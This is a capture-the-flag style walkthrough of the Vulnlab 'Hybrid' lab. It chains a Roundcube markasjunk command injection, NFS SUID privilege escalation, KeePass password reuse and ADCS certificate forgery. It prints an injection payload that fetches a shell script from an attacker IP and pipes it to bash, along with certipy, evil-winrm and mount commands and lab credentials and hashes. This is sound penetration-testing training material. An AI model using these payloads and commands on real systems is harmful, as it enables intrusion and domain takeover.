This is a walkthrough of the AD chain called “Hybrid” from Vulnlab: https://www.vulnlab.com
As of June 2025, Hack The Box HTB has migrated Vulnlab machines onto their lab offerings.
NOTE: The target IP will vary in this walkthrough as it took me several days to complete the AD chain and compromise both machines.
The AD Chain contains 2 machines – the roundcube mail server and the DC. In order to complete this lab, you would need to compromise the mail server in order to get to the DC by forging an active directory certificate.
Mail01 server
Enumeration
rustscan
I run rustscan against the mail server and get some open ports.
rustscan -a 10.10.147.214 --ulimit 5000 --range 1-65535 -- -sVC -Pn
nuclei
I run nuclei and see a CVE-2023-48795 for “Terrapin” but I’m not successful in executing it against the target.
web server redirect
I also navigate directly to the mail server via its IP and I get redirected to mail01.hybrid.vl
I make sure to add the IP in /etc/hosts file and navigate to the URL via the browser:
We now see a login page for Roundcube Webmail.
NFS Mount
If we go back to rustscan we can also see an NFS mount on the mail server.
We run the showmount command to check what directories we can mount to:
Now we will mount to the NFS share:
sudo mount -t nfs 10.10.178.134:/opt/share /home/kali/loot/vulnlab/hybrid/mail01
There is a .zip file on the share and we unzip it with tar and investigate the contents:
tar -xf backup.tar
Investigating the dovecot-users file we can see creds for 2 users:
admin@hybrid.vl:{plain}Duckling21
peter.turner@hybrid.vl:{plain}PeterIstToll!I go back to the login page and I’m able to login to both accounts:
Initial Foothold – Roundcube Webmail RCE
I read the message from the admin and see a clue for the initial foothold.
Doing a google search with those keywords we can see an advisory for markasjunk RCE.
I check the version and confirm that this exploit does exist:
There is a very detailed post on how to execute this exploit here:
https://cyberthint.io/roundcube-markasjunk-command-injection-vulnerability/
From the post, we can add a payload to perform an RCE. We can do this by performing an RCE to execute an RFI to gain a shell into the machine with the following payload:
admin&curl${IFS}10.8.2.31/shell.sh${IFS}|/bin/bash${IFS}&@hybrid.vl
We can host a shell script on our python server with the following content:
I log into the admin webmail this time and enter the payload as in the screenshot below:
I then go into the inbox/sent and mark ANY message as junk and get a shell back.
We can see that a get request was sent to our python server and we can see right after that we get a shell back on our netcat listener on port 1337.
Privesc – NFS, UID and sticky bit on /bin/bash to peter.turner
I ran linpeas to privesc but didn’t have any luck on any of the CVEs listed in the screenshot below:
I checked the output again and noticed there are read/write permissions on the NFS share.
I check the /etc/exports file as well.
Attempting to cd into the /home/peter.turner@hybrid.vl is unsuccessful. If we run the id command on the peter.turner we can see his group and user ID number:
We cannot privesc to root directly from here but we can potentially privesc from www-data to peter.turner first and try to get to root from there. Because we can read/write on /opt/share, we can assign a binary such as /bin/bash a sticky bit via chmod +s and grant ownership of that binary via the uid to peter.turner which will allow any user such as www-data to privesc to peter.turner by running ./bash -p which allows any user to assume the identity of the user whose uid is assigned to that binary.
I create a user on my kali machine with the same UID as peter.turner but I have an issue as the range is above the default configs on my machine:
sudo useradd zero -u 902601108
I edit the /etc/logins.defs and change the UID_MAX value
Changed to 902601109.
I get an issue.
I delete the user and add again.
NOTE: In the next screenshots I mounted to the “temp” folder on my kali machine, different folder from previous screenshots to copy/modify files.
I switch to the zero user with the same uid as peter.turner and copy /bin/bash from my machine to the mount.
su zero
cp /bin/bash temp
Next I go to the /opt/share folder on the target machine and run with ./bash -p to run bash as the user with the UID assigned to the binary but I get some issue:
It seems the GNU C Library (glibc) on the target machine is older than the one I transferred from my kali machine so it’s better to grab the /bin/bash binary from the target system itself and just give it a SUID sticky bit with chmod +s as the zero user who has the same UID as peter.turner.
From my kali machine, I apply the SUID via the zero user.
Going back to the www-data user on the target machine, if we list the permissions it shows that the /bin/bash binary is owned by peter.turner and has the sticky bit.
Once we run ./bash -p as the www-data user, we gain the identity of peter.turner and can confirm below.
We can also go into the peter.turner folder and see the user flag.
We also see a passwords.kdbx file which is a KeePass file and transfer it over into the NFS mount for download onto our kali machine.
Privesc – Root via KeePass creds
We try to open it via KeePass2 on our kali machine but need the master password:
We already have the user peter.turner password from the backup file earlier for the roundcube mail login which is PeterIstToll! – we check for password reuse and are able to get into the kdbx file to check for creds.
We get more creds for the peter.turner user:
I ssh into the mail server for a more stable shell and to check the creds work:
ssh "peter.turner@hybrid.vl"@10.10.190.182
b0cwR+G4Dzl_rw
Running sudo -l we can see that the peter.turner user can simply become root with sudo su command and user creds:
DC server
Enumeration
rustscan
Running rustscan we can see that based on the open ports this is a Windows DC server.
netexec / nxc
I check if the creds are legit with nxc and see that I am able to authenticate:
nxc bloodhound module
I use the nxc bloodhound module to get a bloodhound zip file to ingest into bloodhound.
nxc ldap hybrid.vl -u 'peter.turner' -p 'b0cwR+G4Dzl_rw' --bloodhound -c all -ns 10.10.190.181
I simply copy the bloodhound zip file to my current folder:
After investigating the bloodhound data, I couldn’t find anything useful to help me with the DC:
foothold – Active Directory Certificate Forgery via certipy
Next I check for potentially misconfigured AD certificate templates using certipy. I recommend checking out the THM room for this type of certificate misconfiguration abuse and guide to certipy here: https://tryhackme.com/r/room/cve202226923
We will be using this tool: https://github.com/ly4k/Certipy
However, we can easily install it via pip using the following command on our kali machine:
pip3 install certipy-ad
I run the following command to check for any potentially misconfigured certificate templates:
certipy-ad find -u peter.turner@hybrid.vl -p 'b0cwR+G4Dzl_rw' -vulnerable -dc-ip 10.10.231.197
We check the .txt file and see the output.
We can see that the cert template called “HybridComputers” is vulnerable and “can enroll, enrollee supplies subject and template allows client authentication”
If we look closely it has enrollment permissions for Domain Admins and Enterprise Admins.
We can potentially abuse this to privesc and get an NTLM for a domain admin.
Also note the minimum RSA key length as we will use this to construct our certipy command later to forge the certificate.
If we go back into the RoundCube mail server, there are a few files that stick out in the /etc folder:
There is a krb5.keytab file which contains pairs of Kerberos principals(service or user names) and their corresponding encrypted keys. It’s a critical component in Kerberos authentication, a network authentication protocol designed to provide strong authentication for client/server applications. This makes sense since this is a mail server.
As root on the mail server, we copy this file onto the NFS share so we can extract the NTLM using our kali machine.
We are going to extract the NTLM using KeyTabExtract. Tool can be found here: https://github.com/sosdave/KeyTabExtract
Running KeyTabExtract on the krb5.keytab file, we can extract the NTLM hash for the Mail01$ machine account.
We can now abuse ADCS with certipy and forge a certificate for the Administrator user using the NTLM of the MAIL01$ machine account.
certipy-ad req -u 'MAIL01$' -hashes ':0f916c5246fdbc7ba95dcef4126d57bd' -dc-ip 10.10.231.197 -ca hybrid-DC01-CA -template HYBRIDCOMPUTERS -upn administrator -target hybrid.vl -key-size 4096 -debug
Running the following command, we can see the NTLM hash for the Administrator user:
certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain 'hybrid.vl' -dc-ip 10.10.231.197
We then run evil-winrm to login to the DC as an admin user:
evil-winrm -i 10.10.231.197 -u administrator -H 60701e8543c9f6db1a2af3217386d3dc
Conclusion
This was a fairly challenging AD set and took me several days to complete as my usual tools couldn’t easily pick up ways to escalate or move laterally. This proves that sometimes you need to be meticulous and look for files and configs that seem out of place in order to succeed. This was a good set to practice ADCS exploits as well as web application exploits.
– Z333RO